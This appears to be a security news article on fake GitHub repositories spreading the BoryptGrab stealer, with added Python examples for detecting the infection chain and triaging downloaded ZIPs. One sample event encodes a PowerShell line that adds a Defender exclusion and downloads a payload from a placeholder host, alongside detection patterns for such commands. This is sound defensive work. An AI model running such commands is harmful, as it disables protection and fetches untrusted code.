Cybercriminals are using fake GitHub repositories to spread an information stealer known as BoryptGrab. The campaign targets users who search online for free software, game cheats, or productivity tools. By trading on the trust people place in GitHub, the attackers distribute malicious archives that steal sensitive information.
Security researchers have identified more than 100 public repositories connected to this campaign. Many of them look legitimate and are padded with popular keywords so that they rank in search engine results, which makes it easier for unsuspecting users to find and download the malicious files.
The operation has reportedly been active since 2025, and some of the repositories include Russian-language comments and code patterns. This suggests that the threat actors behind the campaign may be Russian-speaking.
How the Fake GitHub Malware Attack Works

The attack starts when a user downloads a ZIP file from a fake repository. The archive is presented as a useful program such as a gaming tool, media software, or system utility.
Once the user extracts the archive and runs what is inside, a multi-stage infection chain begins.
Some archives contain an executable that relies on DLL sideloading: a legitimate-looking program loads a malicious DLL placed beside it, so the hidden code runs under that program's name. Other versions contain a VBS downloader that executes obfuscated PowerShell commands; these connect to a remote server and fetch additional malware components.
In some cases, the malware also attempts to add Microsoft Defender exclusions, so that the files and processes it drops are not scanned.
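The chain just described (a script host launching PowerShell, an encoded command, a Defender exclusion, a download of the next stage) is what a detection rule should key on. The following is an added example, not code from the article or from any security vendor: it runs over constructed process-creation events whose field names (parent, image, cmdline) are assumptions, and the stage-two script and its host name are made up.

```python
"""Detection logic for the VBS -> PowerShell -> Defender-exclusion chain.

Added example, not code from the article or from any vendor. It checks
simplified process-creation events for three behaviours the article
describes: a VBS script host launching PowerShell, an encoded PowerShell
command that downloads a further stage, and Microsoft Defender exclusions
being added. Event field names and all sample events are constructed.
"""
import base64
import re
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # the hosts that run .vbs files
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Content checks run over the raw command line and over any decoded payload.
CONTENT_PATTERNS = {
    "Defender exclusion added":
        re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b.*?-Exclusion\w*"),
    "download cradle":
        re.compile(r"(?i)\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|"
                   r"DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer)\b"),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        # -EncodedCommand carries base64 of the UTF-16LE script text.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the list of findings for one process-creation event."""
    findings: List[str] = []
    if _basename(ev["image"]) in POWERSHELL and _basename(ev["parent"]) in SCRIPT_HOSTS:
        findings.append("script host spawned PowerShell")
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        findings.append("encoded PowerShell command")
    text = ev["cmdline"] + "\n" + (decoded or "")
    for name, pattern in CONTENT_PATTERNS.items():
        if pattern.search(text):
            findings.append(name)
    return findings


def _encode(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-two script: adds an exclusion, then fetches the next stage.
# The host is a reserved .invalid name, not a real indicator.
STAGE2 = ("Add-MpPreference -ExclusionPath $env:TEMP; "
          "Invoke-WebRequest http://c2.example.invalid/p.bin -OutFile $env:TEMP\\p.bin")

# Constructed sample events; only the first mirrors the chain in the article.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + _encode(STAGE2)},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -Command Get-ChildItem C:\Users"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\tools\backup.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": r"pwsh.exe -Command Add-MpPreference -ExclusionPath C:\Users\Public"},
]


def flagged_events(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each suspicious event to its findings."""
    result: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        findings = analyze_event(ev)
        if findings:
            result[i] = findings
    return result


if __name__ == "__main__":
    for i, findings in flagged_events(SAMPLE_EVENTS).items():
        print(i, _basename(SAMPLE_EVENTS[i]["parent"]), "->", findings)
```

Only the first and last sample events are flagged: the benign Get-ChildItem call and the scheduled backup script pass, even though the latter uses -ExecutionPolicy Bypass, because the checks look at what the command does rather than at PowerShell flags alone. Decoding the -EncodedCommand argument matters here; the obfuscated payload never appears in the clear on the command line.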
After the first stage, different payloads may be installed on the infected system.
| Malware Component | Purpose |
|---|---|
| BoryptGrab | Main data stealer targeting browsers and wallets |
| Vidar Variant | Additional information stealing malware |
| HeaconLoad | Golang-based downloader used to fetch payloads |
| TunnesshClient | Backdoor that creates reverse SSH tunnels |
This modular design allows attackers to change payloads depending on the victim.
Data Theft Targeting Browsers and Crypto Wallets

The main malware in this campaign, BoryptGrab, is written in C/C++ and is designed to steal large amounts of data.
It targets major web browsers including:
- Chrome
- Edge
- Brave
- Opera
- Firefox
- Vivaldi
- Chromium-based browsers
- Yandex Browser
The malware can extract saved passwords, browsing data, and stored credentials, and it uses techniques to get around the encryption Chrome applies to this locally stored data, so the stolen values are usable by the attackers.
Cryptocurrency wallets are another major target. The malware searches for both desktop wallet applications and browser extensions.
Some targeted wallets include:
- Exodus
- Electrum
- Ledger
- Trezor
- Atomic Wallet
- Binance Wallet
- Wasabi Wallet
- Bitcoin Core
- Ethereum wallets
In addition to wallet data, the malware can collect Telegram and Discord data, system details, screenshots, and files stored in common folders.
Once the data is collected, it is compressed and uploaded to attacker-controlled servers.
Why This Campaign Is Dangerous
This campaign highlights how cybercriminals are combining several tactics to scale their attacks. These include SEO manipulation, fake GitHub projects, modular malware loaders, and cryptocurrency theft tools.
Because the repositories appear legitimate and rank well in search results, many users may unknowingly download infected files.
Users looking for free tools or cracked software are especially at risk.
How Users Can Stay Safe
To avoid becoming a victim of malware campaigns like BoryptGrab:
- Download software only from trusted official sources
- Review a repository's commit history, contributors, and release assets before downloading anything from it
- Avoid downloading unknown ZIP archives from public projects
- Keep antivirus and system security tools updated
- Be cautious of repositories with very little documentation or suspicious comments
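The review step above can be partly automated before any file in a download is run. The following is an added example, not code from the article: it inspects a downloaded ZIP by member names only, flagging script files such as a VBS downloader, executables, and an .exe next to a .dll in the same folder (the layout DLL sideloading relies on). The two archives it checks are constructed in memory, and every file name and content in them is made up.

```python
"""Static triage of a downloaded archive before anything in it is run.

Added example, not code from the article. It builds two constructed ZIP
archives in memory (one shaped like the lures the article describes, one
benign) and reports what to look at before trusting the download. Nothing
is extracted or executed; only member names are inspected.
"""
import io
import posixpath
import zipfile
from typing import Dict, List

SCRIPT_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd"}
BINARY_EXT = {".exe", ".dll", ".scr", ".com"}


def triage_zip(data: bytes) -> Dict[str, list]:
    """Inspect archive members by name and return the things worth a look."""
    findings: Dict[str, list] = {"scripts": [], "executables": [], "sideload_candidates": []}
    per_dir: Dict[str, Dict[str, List[str]]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            folder, base = posixpath.split(name)
            ext = posixpath.splitext(base)[1].lower()
            if ext in SCRIPT_EXT:
                findings["scripts"].append(name)
            if ext in BINARY_EXT:
                findings["executables"].append(name)
            if ext in (".exe", ".dll"):
                per_dir.setdefault(folder, {".exe": [], ".dll": []})[ext].append(name)
    # An EXE and a DLL in the same folder is the layout DLL sideloading needs:
    # the EXE resolves the DLL by name from its own directory first. Legitimate
    # software ships this way too, so it is a candidate for review, not proof.
    for folder, group in per_dir.items():
        if group[".exe"] and group[".dll"]:
            findings["sideload_candidates"].append((folder, group[".exe"], group[".dll"]))
    return findings


def needs_review(findings: Dict[str, list]) -> bool:
    """True if the archive should not be run without a closer look."""
    return bool(findings["scripts"] or findings["sideload_candidates"])


def build_zip(entries: Dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP from {path: content} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in entries.items():
            zf.writestr(path, content)
    return buf.getvalue()


# Constructed lure: an EXE, a DLL beside it, and a VBS "installer".
LURE_ENTRIES = {
    "FreeTool/FreeTool.exe": b"MZ" + b"\x00" * 62,
    "FreeTool/helper.dll": b"MZ" + b"\x00" * 62,
    "FreeTool/install.vbs": b'Set sh = CreateObject("WScript.Shell")\r\n',
    "FreeTool/README.txt": b"Run install.vbs to activate.\r\n",
}

# Constructed benign archive for comparison.
BENIGN_ENTRIES = {
    "notes/README.md": b"# notes\n",
    "notes/config.json": b"{}\n",
}


if __name__ == "__main__":
    for label, entries in (("lure", LURE_ENTRIES), ("benign", BENIGN_ENTRIES)):
        result = triage_zip(build_zip(entries))
        print(label, "needs review" if needs_review(result) else "clean", result)
```

A script file inside what claims to be a compiled tool, or an installer that asks the user to run a .vbs, is the clearest signal here; the EXE-plus-DLL pairing only says where to look next (for instance, whether the EXE is a signed copy of some well-known program that has no business shipping with that DLL).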
Fake GitHub repositories spreading BoryptGrab malware show how attackers are evolving their tactics to target everyday users and cryptocurrency holders. Staying aware of these threats and practicing safe download habits can help protect your data and digital assets.